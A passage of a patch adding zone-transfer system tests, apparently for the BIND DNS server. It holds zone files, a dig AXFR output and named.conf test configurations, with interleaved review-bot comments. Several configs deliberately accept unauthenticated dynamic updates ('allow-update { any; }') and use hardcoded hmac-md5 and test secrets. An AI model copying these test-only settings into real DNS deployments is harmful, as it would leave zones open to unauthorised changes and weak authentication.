65534 65535 PRIVATEOID MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +cname01.example. 3600 IN CNAME cname-target. +cname02.example. 3600 IN CNAME cname-target.example. +cname03.example. 3600 IN CNAME . +csync01.example. 3600 IN CSYNC 0 0 A NS AAAA +csync02.example. 
3600 IN CSYNC 0 0 +dhcid01.example. 3600 IN DHCID AAIBY2/AuCccgoJbsaxcQc9TUapptP69lOjxfNuVAA2kjEA= +dhcid02.example. 3600 IN DHCID AAEBOSD+XR3Os/0LozeXVqcNc7FwCfQdWL3b/NaiUDlW2No= +dhcid03.example. 3600 IN DHCID AAABxLmlskllE0MVjd57zHcWmEH3pCQ6VytcKD//7es/deY= +dlv.example. 3600 IN DLV 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +dname01.example. 3600 IN DNAME dname-target. +dname02.example. 3600 IN DNAME dname-target.example. +dname03.example. 3600 IN DNAME . +doa01.example. 3600 IN DOA 1234567890 1234567890 1 "image/gif" R0lGODlhKAAZAOMCAGZmZgBmmf///zOZzMz//5nM/zNmmWbM/5nMzMzMzACZ/////////////////////yH5BAEKAA8ALAAAAAAoABkAAATH8IFJK5U2a4337F5ogRkpnoCJrly7PrCKyh8c3HgAhzT35MDbbtO7/IJIHbGiOiaTxVTpSVWWLqNq1UVyapNS1wd3OAxug0LhnCubcVhsxysQnOt4ATpvvzHlFzl1AwODhWeFAgRpen5/UhheAYMFdUB4SFcpGEGGdQeCAqBBLTuSk30EeXd9pEsAbKGxjHqDSE0Sp6ixN4N1BJmbc7lIhmsBich1awPAjkY1SZR8bJWrz382SGqIBQQFQd4IsUTaX+ceuudPEQA7 +doa02.example. 3600 IN DOA 0 1 2 "" aHR0cHM6Ly93d3cuaXNjLm9yZy8= +ds01.example. 3600 IN NS ns42.example. +ds01.example. 3600 IN DS 12892 5 2 26584835CA80C81C91999F31CFAF2A0E89D4FF1C8FAFD0DDB31A85C7 19277C13 +ds02.example. 3600 IN NS ns43.example. +ds02.example. 3600 IN DS 12892 5 1 7AA4A3F416C2F2391FB7AB0D434F762CD62D1390 +eid01.example. 3600 IN EID 1289AB +eui48.example. 3600 IN EUI48 01-23-45-67-89-ab +eui64.example. 3600 IN EUI64 01-23-45-67-89-ab-cd-ef +gid01.example. 3600 IN GID \# 1 03 +unspec01.example. 3600 IN UNSPEC \# 1 04 +gpos01.example. 3600 IN GPOS "-22.6882" "116.8652" "250.0" +gpos02.example. 3600 IN GPOS "" "" "" +hinfo01.example. 3600 IN HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02.example. 3600 IN HINFO "PC" "NetBSD" +ipseckey01.example. 3600 IN IPSECKEY 10 1 2 192.0.2.38 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey02.example. 3600 IN IPSECKEY 10 0 2 . AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey03.example. 3600 IN IPSECKEY 10 1 2 192.0.2.3 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey04.example. 
3600 IN IPSECKEY 10 3 2 mygateway.example.com. AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey05.example. 3600 IN IPSECKEY 10 2 2 2001:db8:0:8002::2000:1 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +isdn01.example. 3600 IN ISDN "isdn-address" +isdn02.example. 3600 IN ISDN "isdn-address" "subaddress" +isdn03.example. 3600 IN ISDN "isdn-address" +isdn04.example. 3600 IN ISDN "isdn-address" "subaddress" +hip1.example. 3600 IN HIP 2 200100107B1A74DF365639CC39F1D578 AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D +hip2.example. 3600 IN HIP 2 200100107B1A74DF365639CC39F1D578 AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D rvs.example.com. +dnskey01.example. 3600 IN DNSKEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +https0.example. 3600 IN HTTPS 0 example.net. +https1.example. 3600 IN HTTPS 1 . port=60 +keydata.example. 3600 IN TYPE65533 \# 0 +keydata.example. 3600 IN TYPE65533 \# 6 010203040506 +keydata.example. 3600 IN TYPE65533 \# 18 010203040506010203040506010203040506 +kx01.example. 3600 IN KX 10 kdc.example. +kx02.example. 3600 IN KX 10 . +loc01.example. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02.example. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +l32.example. 3600 IN L32 10 1.2.3.4 +l64.example. 3600 IN L64 10 14:4fff:ff20:ee64 +lp.example. 3600 IN LP 10 example.net. +nid.example. 3600 IN NID 10 14:4fff:ff20:ee64 +mb01.example. 3600 IN MG madname.example. +mb02.example. 3600 IN MG . +mg01.example. 3600 IN MG mgmname.example. +mg02.example. 3600 IN MG . +minfo01.example. 3600 IN MINFO rmailbx.example. emailbx.example. +minfo02.example. 
3600 IN MINFO . . +mr01.example. 3600 IN MR mrname.example. +mr02.example. 3600 IN MR . +mx01.example. 3600 IN MX 10 mail.example. +mx02.example. 3600 IN MX 10 . +naptr01.example. 3600 IN NAPTR 0 0 "" "" "" . +naptr02.example. 3600 IN NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nimloc01.example. 3600 IN NIMLOC 1289AB +ninfo01.example. 3600 IN NINFO "foo" +ninfo02.example. 3600 IN NINFO "foo" "bar" +ninfo03.example. 3600 IN NINFO "foo" +ninfo04.example. 3600 IN NINFO "foo" "bar" +ninfo05.example. 3600 IN NINFO "foo bar" +ninfo06.example. 3600 IN NINFO "foo bar" +ninfo07.example. 3600 IN NINFO "foo bar" +ninfo08.example. 3600 IN NINFO "foo\010bar" +ninfo09.example. 3600 IN NINFO "foo\010bar" +ninfo10.example. 3600 IN NINFO "foo bar" +ninfo11.example. 3600 IN NINFO "\"foo\"" +ninfo12.example. 3600 IN NINFO "\"foo\"" +ninfo13.example. 3600 IN NINFO "foo;" +ninfo14.example. 3600 IN NINFO "foo;" +ninfo15.example. 3600 IN NINFO "bar\\;" +ns2.example. 3600 IN A 10.53.0.2 +ns3.example. 3600 IN A 10.53.0.3 +nsap-ptr01.example. 3600 IN NSAP-PTR . +nsap-ptr01.example. 3600 IN NSAP-PTR foo. +nsap01.example. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02.example. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsec01.example. 3600 IN NSEC a.secure.nil. NS SOA MX LOC RRSIG NSEC DNSKEY +nsec02.example. 3600 IN NSEC . NSAP-PTR NSEC +nsec03.example. 3600 IN NSEC . A +nsec04.example. 3600 IN NSEC . TYPE127 +openpgpkey.example. 3600 IN OPENPGPKEY AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +ptr01.example. 3600 IN PTR example. +px01.example. 3600 IN PX 65535 foo. bar. +px02.example. 3600 IN PX 65535 . . +rkey01.example. 3600 IN RKEY 0 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +rp01.example. 3600 IN RP mbox-dname.example. txt-dname.example. 
+rp02.example. 3600 IN RP . . +rt01.example. 3600 IN RT 0 intermediate-host.example. +rt02.example. 3600 IN RT 65535 . +rrsig01.example. 3600 IN RRSIG NSEC 1 3 3600 20000102030405 19961211100908 2143 foo.nil. MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +sink01.example. 3600 IN SINK 1 0 0 +sink02.example. 3600 IN SINK 8 0 2 l4ik +smimea.example. 3600 IN SMIMEA 1 1 2 92003BA34942DC74152E2F2C408D29ECA5A520E7F2E06BB944F4DCA3 46BAF63C1B177615D466F6C4B71C216A50292BD58C9EBDD2F74E38FE 51FFD48C43326CBC +spf01.example. 3600 IN SPF "v=spf1 -all" +spf02.example. 3600 IN SPF "v=spf1" " -all" +srv01.example. 3600 IN SRV 0 0 0 . +srv02.example. 3600 IN SRV 65535 65535 65535 old-slow-box.example. +sshfp01.example. 3600 IN SSHFP 4 2 C76D8329954DA2835751E371544E963EFDA099080D6C58DD2BFD9A31 6E162C83 +sshfp02.example. 3600 IN SSHFP 1 2 BF29468C83AC58CCF8C85AB7B3BEB054ECF1E38512B8353AB36471FA 88961DCC +svcb0.example. 3600 IN SVCB 0 example.net. +svcb1.example. 3600 IN SVCB 1 . port=60 +ta.example. 3600 IN TA 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +talink0.example. 3600 IN TALINK . talink1.example. +talink1.example. 3600 IN TALINK talink0.example. talink2.example. +talink2.example. 3600 IN TALINK talink2.example. . +tlsa.example. 3600 IN TLSA 1 1 2 92003BA34942DC74152E2F2C408D29ECA5A520E7F2E06BB944F4DCA3 46BAF63C1B177615D466F6C4B71C216A50292BD58C9EBDD2F74E38FE 51FFD48C43326CBC +txt01.example. 3600 IN TXT "foo" +txt02.example. 3600 IN TXT "foo" "bar" +txt03.example. 3600 IN TXT "foo" +txt04.example. 3600 IN TXT "foo" "bar" +txt05.example. 3600 IN TXT "foo bar" +txt06.example. 3600 IN TXT "foo bar" +txt07.example. 3600 IN TXT "foo bar" +txt08.example. 3600 IN TXT "foo\010bar" +txt09.example. 3600 IN TXT "foo\010bar" +txt10.example. 3600 IN TXT "foo bar" +txt11.example. 3600 IN TXT "\"foo\"" +txt12.example. 3600 IN TXT "\"foo\"" +txt13.example. 3600 IN TXT "foo;" +txt14.example. 3600 IN TXT "foo;" +txt15.example. 
3600 IN TXT "bar\\;" +uid01.example. 3600 IN UID \# 1 02 +uinfo01.example. 3600 IN UINFO \# 1 01 +uri01.example. 3600 IN URI 10 20 "https://www.isc.org/" +uri02.example. 3600 IN URI 30 40 "https://www.isc.org/HolyCowThisSureIsAVeryLongURIRecordIDontEvenKnowWhatSomeoneWouldEverWantWithSuchAThingButTheSpecificationRequiresThatWesupportItSoHereWeGoTestingItLaLaLaLaLaLaLaSeriouslyThoughWhyWouldYouEvenConsiderUsingAURIThisLongItSeemsLikeASillyIdeaButEnhWhatAreYouGonnaDo/" +uri03.example. 3600 IN URI 30 40 "" +wks01.example. 3600 IN WKS 10.0.0.1 6 0 1 2 21 23 +wks02.example. 3600 IN WKS 10.0.0.1 17 0 1 2 53 +wks03.example. 3600 IN WKS 10.0.0.2 6 65535 +x2501.example. 3600 IN X25 "123456789" +zonemd01.example. 3600 IN ZONEMD 2019020700 1 1 C220B8A6ED5728A971902F7E3D4FD93ADEEA88B0453C2E8E8C863D46 5AB06CF34EB95B266398C98B59124FA239CB7EEB +zonemd02.example. 3600 IN ZONEMD 2019020700 1 2 08CFA1115C7B948C4163A901270395EA226A930CD2CBCF2FA9A5E6EB 85F37C8A4E114D884E66F176EAB121CB02DB7D652E0CC4827E7A3204 F166B47E5613FD27 +8f1tmio9avcom2k0frp92lgcumak0cad.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C 8FPNS2UCT7FBS643THP2B77PEQ77K6IU A NS SOA MX AAAA RRSIG DNSKEY NSEC3PARAM +kcd3juae64f9c5csl1kif1htaui7un0g.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C KD5MN2M20340DGO0BL7NTSB8JP4BSC7E +mr5ukvsk1l37btu4q7b1dfevft4hkqdk.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C MT38J6VG7S0SN5G17MCUF6IQIKFUAJ05 A AAAA RRSIG +example. 86400 IN SOA ns2.example. hostmaster.example. 1397051953 5 5 1814400 3600 diff --git a/bin/tests/system/xfer/knowngood.mapped b/bin/tests/system/xfer/knowngood.mapped new file mode 100644 index 0000000..5fcd00b --- /dev/null +++ b/bin/tests/system/xfer/knowngood.mapped 
@@ -0,0 +1,26 @@
+
+; <<>> DiG 9.10.2-P3 <<>> -p 5300 axfr mapped @10.53.0.3
+;; global options: +cmd
+mapped. 3600 IN SOA . . 0 0 0 2147483647 0
+example.aa. 3600 IN A 1.2.3.4
+example1.aa. 3600 IN A 1.2.3.4
+example.bb. 3600 IN A 1.2.3.4
+example1.bb. 3600 IN A 1.2.3.4
+example.com. 3600 IN A 1.2.3.4
+example1.com. 3600 IN A 1.2.3.4
+bar.dd. 3600 IN A 1.2.3.4
+foo.ee. 3600 IN A 1.2.3.4
+foo.ff. 3600 IN A 1.2.3.4
+foo.gg. 3600 IN A 1.2.3.4
+foo.hh. 3600 IN A 1.2.3.4
+foo.ii. 3600 IN A 1.2.3.4
+foo.jj. 3600 IN A 1.2.3.4
+foo.kk. 3600 IN A 1.2.3.4
+foo.ll. 3600 IN A 1.2.3.4
+mapped. 3600 IN NS .
+mapped. 3600 IN SOA . . 0 0 0 2147483647 0
+;; Query time: 4 msec
+;; SERVER: 10.53.0.3#5300(10.53.0.3)
+;; WHEN: Tue Feb 16 14:38:25 EST 2016
+;; XFR size: 18 records (messages 1, bytes 468)
+
diff --git a/bin/tests/system/xfer/ns1/axfr-too-big.db b/bin/tests/system/xfer/ns1/axfr-too-big.db
new file mode 100644
index 0000000..37987a6
--- /dev/null
+++ b/bin/tests/system/xfer/ns1/axfr-too-big.db
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ IN SOA . . 0 0 0 0 0
+@ IN NS .
+$GENERATE 1-29 host$ A 1.2.3.$
diff --git a/bin/tests/system/xfer/ns1/ixfr-too-big.db.in b/bin/tests/system/xfer/ns1/ixfr-too-big.db.in
new file mode 100644
index 0000000..c192316
--- /dev/null
+++ b/bin/tests/system/xfer/ns1/ixfr-too-big.db.in
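Review bot: ns1/axfr-too-big.db carries no comment tying its `$GENERATE 1-29` range to the `max-records 30;` limit that ns6/named.conf.in sets for this zone later in the same patch, so the purpose of the fixture can only be recovered by counting records. With the SOA and NS the zone holds 31 records, one over the limit (assuming named counts every record), while ns1/ixfr-too-big.db.in (`$GENERATE 1-25` plus SOA, two NS and two A) holds exactly 30 and presumably crosses the limit only after a later update. I would add `; 29 generated + SOA + NS = 31 records, one more than max-records 30 on ns6` above the `$GENERATE` line, and `; 30 records: exactly at max-records 30 on ns6` in ixfr-too-big.db.in. That way an edit to either file does not silently stop exercising the transfer-size limit.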
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ IN SOA . . 0 0 0 0 0
+@ IN NS ns1
+@ IN NS ns6
+ns1 IN A 10.53.0.1
+ns6 IN A 10.53.0.6
+$GENERATE 1-25 host$ A 1.2.3.$
diff --git a/bin/tests/system/xfer/ns1/named.conf.in b/bin/tests/system/xfer/ns1/named.conf.in
new file mode 100644
index 0000000..3ff6cdf
--- /dev/null
+++ b/bin/tests/system/xfer/ns1/named.conf.in
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "secondary" {
+ type primary;
+ file "sec.db";
+};
+
+zone "edns-expire" {
+ type primary;
+ file "edns-expire.db";
+};
+
+zone "axfr-too-big" {
+ type primary;
+ file "axfr-too-big.db";
+};
+
+zone "ixfr-too-big" {
+ type primary;
+ allow-update { any; };
+ file "ixfr-too-big.db";
+};
+
+zone "xfer-stats" {
+ type primary;
+ file "xfer-stats.db";
+};
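Review bot: In ns1/named.conf.in the `ixfr-too-big` zone is opened with `allow-update { any; };` and the control channel with `allow { any; }`, and neither line says that this is acceptable only because the server listens on the 10.53.0.1 test address. The update ACL accepts unsigned changes from any client that can reach the port, whereas the rndc channel is at least still gated by `keys { rndc_key; }`. I would add a comment such as `/* test fixture: unauthenticated updates are intentional; the server listens on 10.53.0.1 only */` above `allow-update`, or narrow the ACL to the address the test sends updates from if tests.sh (cut off in this view) allows that. The same `allow { any; }` control line recurs in the ns2, ns3, ns4, ns6, ns7 and ns8 configurations of this patch.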
diff --git a/bin/tests/system/xfer/ns1/root.db b/bin/tests/system/xfer/ns1/root.db
new file mode 100644
index 0000000..58a675c
--- /dev/null
+++ b/bin/tests/system/xfer/ns1/root.db
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+
+tsigzone. NS ns2.tsigzone.
+ns2.tsigzone. A 10.53.0.2
diff --git a/bin/tests/system/xfer/ns1/xfer-stats.db b/bin/tests/system/xfer/ns1/xfer-stats.db
new file mode 100644
index 0000000..42e1c9c
--- /dev/null
+++ b/bin/tests/system/xfer/ns1/xfer-stats.db
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA . . 0 0 0 0 0
+@ NS .
+$GENERATE 1-10000 $ TXT $
diff --git a/bin/tests/system/xfer/ns2/mapped.db.in b/bin/tests/system/xfer/ns2/mapped.db.in
new file mode 100644
index 0000000..d928d69
--- /dev/null
+++ b/bin/tests/system/xfer/ns2/mapped.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+mapped. 3600 IN SOA . . 0 0 0 2147483647 0
+example.aa. 3600 IN A 1.2.3.4
+example1.aa. 3600 IN A 1.2.3.4
+example.bb. 3600 IN A 1.2.3.4
+example1.bb. 3600 IN A 1.2.3.4
+example.com. 3600 IN A 1.2.3.4
+example1.com. 3600 IN A 1.2.3.4
+bar.dd. 3600 IN A 1.2.3.4
+foo.ee. 3600 IN A 1.2.3.4
+foo.ff. 3600 IN A 1.2.3.4
+foo.gg. 3600 IN A 1.2.3.4
+foo.hh. 3600 IN A 1.2.3.4
+foo.ii. 3600 IN A 1.2.3.4
+foo.jj. 3600 IN A 1.2.3.4
+foo.kk. 3600 IN A 1.2.3.4
+foo.ll. 3600 IN A 1.2.3.4
+mapped. 3600 IN NS .
diff --git a/bin/tests/system/xfer/ns2/named.conf.in b/bin/tests/system/xfer/ns2/named.conf.in
new file mode 100644
index 0000000..fbde9c1
--- /dev/null
+++ b/bin/tests/system/xfer/ns2/named.conf.in
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ ixfr-from-differences yes;
+ check-integrity no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+key tsigzone. {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+acl tzkey {
+ key tsigzone.;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
+
+zone "tsigzone" {
+ type primary;
+ file "tsigzone.db";
+ allow-transfer { tzkey; };
+};
+
+zone "secondary" {
+ type secondary;
+ file "sec.db";
+ primaries { 10.53.0.1; };
+ masterfile-format text;
+};
+
+zone "mapped" {
+ type secondary;
+ file "mapped.db";
+ masterfile-format text;
+ primaries { 10.53.0.100; };
+};
diff --git a/bin/tests/system/xfer/ns2/sec.db.in b/bin/tests/system/xfer/ns2/sec.db.in
new file mode 100644
index 0000000..7978598
--- /dev/null
+++ b/bin/tests/system/xfer/ns2/sec.db.in
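Review bot: `key tsigzone.` in ns2/named.conf.in uses `algorithm hmac-md5;`, as do the matching key in ns3/named.conf.in, `unused_key.` and `tsig_key.` in ns4/named.conf.base and `key1.` in ns8/named.conf.in. HMAC-MD5 is no longer recommended for TSIG, and a build where MD5 is unavailable (FIPS mode, for instance) would probably refuse to load these files, so the transfer tests could not run there. Moving the zone-transfer keys to `algorithm hmac-sha256;` would also need the `-y tsigzone.:1234abcd8765` arguments in tests.sh to name the algorithm, as in `-y hmac-sha256:tsigzone.:1234abcd8765`, since dig otherwise assumes its default. Separately, ns2, ns3 and ns4 define `rndc_key` inline while ns1, ns6, ns7 and ns8 use `include "../../common/rndc.key";`. Using the include everywhere would keep the control secret in one place, provided that file holds the same key.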
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 5
+
+@ IN SOA ns1 hostmaster 1 5 5 5 5
+@ NS ns1
+ns1 A 10.53.0.1
+a01 A 1.1.1.1
+a02 A 255.255.255.255
+
diff --git a/bin/tests/system/xfer/ns3/named.conf.in b/bin/tests/system/xfer/ns3/named.conf.in
new file mode 100644
index 0000000..5fc0183
--- /dev/null
+++ b/bin/tests/system/xfer/ns3/named.conf.in
@@ -0,0 +1,79 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+key tsigzone. {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "example.bk";
+};
+
+zone "primary" {
+ type secondary;
+ primaries { 10.53.0.6; };
+ file "primary.bk";
+};
+
+server 10.53.0.2 {
+ keys { tsigzone.; };
+};
+
+zone "tsigzone" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "tsigzone.bk";
+ allow-transfer { key tsigzone.; };
+};
+
+zone "mapped" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ masterfile-format map;
+ file "mapped.bk";
+};
+
+zone "xfer-stats" {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "xfer-stats.bk";
+};
diff --git a/bin/tests/system/xfer/ns4/named.conf.base b/bin/tests/system/xfer/ns4/named.conf.base
new file mode 100644
index 0000000..8e77d0c
--- /dev/null
+++ b/bin/tests/system/xfer/ns4/named.conf.base
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ blackhole { none; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+key unused_key. {
+ secret "1234abcd8765";
+ algorithm hmac-md5;
+};
+
+key tsig_key. {
+ secret "LSAnCU+Z";
+ algorithm hmac-md5;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/xfer/ns4/root.db.in b/bin/tests/system/xfer/ns4/root.db.in
new file mode 100644
index 0000000..29ee0ec
--- /dev/null
+++ b/bin/tests/system/xfer/ns4/root.db.in
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 SOA . . 0 0 0 0 0
+@ 0 NS .
+@ 0 A 10.53.0.4
diff --git a/bin/tests/system/xfer/ns6/named.conf.in b/bin/tests/system/xfer/ns6/named.conf.in
new file mode 100644
index 0000000..636400c
--- /dev/null
+++ b/bin/tests/system/xfer/ns6/named.conf.in
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
